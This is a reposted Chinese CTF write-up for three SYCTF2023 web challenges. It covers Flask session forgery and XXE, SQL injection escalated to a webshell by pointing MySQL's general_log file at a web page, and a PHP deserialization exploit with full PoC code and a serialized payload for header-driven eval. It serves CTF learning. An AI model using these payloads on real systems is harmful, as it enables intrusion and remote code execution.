SYCTF2023 WEB writeup

这篇具有很好参考价值的文章主要介绍了SYCTF2023 WEB writeup。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

CarelessPy

一进来就是个任意文件下载功能,不过做了些限制,这题从头到尾都在骂杂鱼。。。(虽然我确实是(bushi)

查看页面源代码,给了个/eval /login 两个路由,/eval是个目录遍历,/login尝试登录无果,有session,应该需要伪造session,利用/eval查看app下的pyc文件,然后down下载

在线找个pyc反编译,成功拿到密钥

直接flask-session-manager伪造session,登录成功后拿到/th1s_1s_The_L4st_one 这个路由,访问查看,xml的页面,猜想存在xxe漏洞,抓个包分析分析,直接payload打,注意得加个Content-Type: text/xml 否则打不通

Confronting robot

这题给我ex坏了,第一个页面,myname参数存在注入,sqlmap一把梭

访问/sEcR@t_n@Bodyknow.php 测试发现这是个模拟sql命令行,可以执行sql命令,查看页面源代码发现game.php ,访问查看,猜拳10局,赢了就给flag,结果game表里没有数据,猜测是得我们插入数据来确保我们稳赢,查看当前用户是secret@localhost ,查看一下权限show grants for secret@localhsot,一看不知道一看吓一跳,基本没有权限,有个查询权限和创建用户权限,这还写个屁数据,这里折磨了一整天,想了一堆办法终无果,最终查看大佬方法,开启日志查询,写马getshell,额贼,佩服能想到的,先开启全局日志查询,然后设置当前文件为日志存储文件,这样只需select '',然后 蚁剑连接即可。记得把你的火绒关掉,要不然给拦截了

set global general_log='on'
set global general_log_file='/var/www/html/sEcR@t_n@Bodyknow.php'

查看game.php拿到flag

听说还有修改用户的玩法,有无大佬蕉蕉

4号的罗纳尔多

php审计,代码如下:

<?php
error_reporting(0);
highlight_file(__FILE__);
class evil{
    public $cmd;
    public $a;
    public function __destruct(){
        if('VanZZZZY' === preg_replace('/;+/','VanZZZZY',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){
            eval($this->cmd.'givemegirlfriend!');
        } else {
            echo 'nonono';
        }
    }
}

if(!preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i',$_GET['Pochy'])){
    unserialize($_GET['Pochy']);
} else {
    echo 'nonono';
}

很经典不能O,a开头,那我们就C开头,不能有ArrayObject,啧,之前ctfshow学到的没用了,最终发现SplStack这个类也能用,然后就是绕__destruct,也就是只能使用[A-Za-z_\(\)],最后带个; 怎么把givemegirlfriend! 除掉是个问题,__halt_compiler(); 可以中断编译器的执行,不让eval解析后面的就行了,这里没法用引号,所以得构造无参rce,exp如下:

<?php
class evil
{
    public $cmd="eval(end(getallheaders()));__halt_compiler();";
}
$a=new SplStack();
$a->push(new evil());
$b=serialize($a);
echo($b);

// 注意得修改成符合C的格式,具体可以自己查资料
// C:8:"SplStack":84:{i:0;:O:4:"evil":1:{s:3:"cmd";s:45:"eval(end(getallheaders()));__halt_compiler();";};}

复现复现着环境没了,日。。。。,最终在本地打通。文章来源地址https://www.toymoban.com/news/detail-478857.html

到了这里,关于SYCTF2023 WEB writeup的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • HGame 2023 Week2 部分Writeup

    文章将第二周比赛结束后发布于我的博客:https://blog.vvbbnn00.cn/archives/hgame2023week2-bu-fen-writeup 第二周的解题过程中,遇到的不少有意思的题目,同时,也学习到了不少的知识,故书写此题解,作为记录。 Week2 比赛地址:https://hgame.vidar.club/contest/3 顾名思义,是一道Git泄露题,使

    2023年04月19日
    浏览(52)
  • HGame 2023 Week4 部分Writeup

    文章同时发布于我的博客:https://blog.vvbbnn00.cn/archives/hgame2023week4-bu-fen-writeup 第四周的比赛难度较高,同时也出现了不少颇为有趣的题目。可惜笔者比较菜,做出来的题目数量并不是很多,不过里面确实有几道题值得好好讲讲。不多废话了,抓紧端上来吧(喜)。 注:本周C

    2024年02月03日
    浏览(49)
  • 【ISCC2023线下】MISC1-帮帮小明writeup

    流量分析,TLS,二维码修复 首先速览一遍帮帮小明.pcapng,发现里面的协议有IMAP和TLS,这部分可能有线索 打开统计-会话,TCP栏有两个终点为25端口的地址,追踪流量,是两次对话 发现一个压缩包 保存,发现有密码,里面是一个加密后的文件mosaic.bmp,用zipcenop排除了伪加密的

    2024年02月08日
    浏览(75)
  • 2023 广东海洋大学 GDOUCTF Writeup By AheadSec

    感谢战队的每位同学,辛苦了~ Web: Nacl 、 monkey777 、 peakaboo Pwn: zsNick Crypto: Nacl Reverse: kcldah Misc: mochu7 、 Nacl 最终成绩第17名: 打开界面看到是个贪吃蛇游戏,拿flag的条件是坚持60秒,玩了一下可以发现蛇会越来越快,那么肯定有个参数控制蛇的速度 然后打开右键检查查看源代

    2024年02月02日
    浏览(57)
  • 2023NKCTF Writeup——W4ntY0u.

     简介 NKCTF2023是由N0wayBack战队举办。本次比赛采用线上网络安全技能大赛实践赛的形式,覆盖Web、Reverse、Pwn、Misc、Crypto、SocialEngineering等主流赛题方向,面向国内所有个体及团队 除了梦想外我们一无所有,将会和蔑视与困境做最后的斗争,这是最后一舞! 最终结果 经过三天

    2024年02月11日
    浏览(40)
  • DASCTF Apr.2023 X SU Writeup By AheadSec

    战队的每位同学辛苦了~ Web: Nacl Pwn: zsNick Reverse: kcldah Misc: mochu7 最终第15名 这题非预期了,有个Thinkphp5的代码执行未修复 http://6399e5ef-2a0f-4320-a88d-1eac8ce4761e.node4.buuoj.cn:81/index.php?s=index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=cat+%2Fflag 参考链接:https://www.cnblogs

    2024年02月04日
    浏览(75)
  • 2023第二届陇剑杯网络安全大赛 预选赛Writeup

    题目附件 这题其实可以参考这篇文章:从一道题分析Nmap SYN/半连接/半开放扫描流量 TCP扫描确认端口开放的标志就是返回 SYN+ACK 的包,所以只需要过滤 SYN、ACK 状态都为 1 的包即可 答案 过滤 http 发现这里有个 shell.jsp 右键追踪HTTP流,可以看到 shell.jsp 的内容,哥斯拉AES加密的

    2024年02月11日
    浏览(71)
  • 2023年四川省网络与信息安全技能大赛初赛 个人赛 Writeup

    反序列化 、 eval截断 、 无参数RCE 然后在写入一个webshell反弹 webshell反弹之后在根目录下看到 secret.txt ,里面存着用户 boogipop 的密码 之后直接 cat /flag 就行 在源码中飞机爆炸处理之后有一个GET参数请求 直接传 scores 即可获得flag: /useful.php?scores=1000000000 给了源码,但是登录后

    2024年02月07日
    浏览(47)
  • 2023第三届”红明谷“杯网络安全大赛 Writeup By AheadSec

    修改前端js代码,将连点10次处的 clickDecryptBtn(); 循环次数改为10000即可,如图所示: Dreamer cms有nday:https://forum.butian.net/share/2183 其中有一个后台设置栏目存在任意文件读取的漏洞,而且也给了flag位置在 /flag 保存,然后首页点击这个栏目即可 返回都是 gzip 格式的数据,直接用

    2023年04月24日
    浏览(48)
  • uniapp 一进页面是白名单,无需登录,直接进入

    用户未登录可以进白名单的页面(即分享页面,无需登录) 用户已登录进入相应的界面 用户一进白名单的页面直接进去 用户跳转到未登录的页面并且不是白名单的一律直接到登录页面 路由守卫 app.vue的全局控制 项目结构

    2024年02月11日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包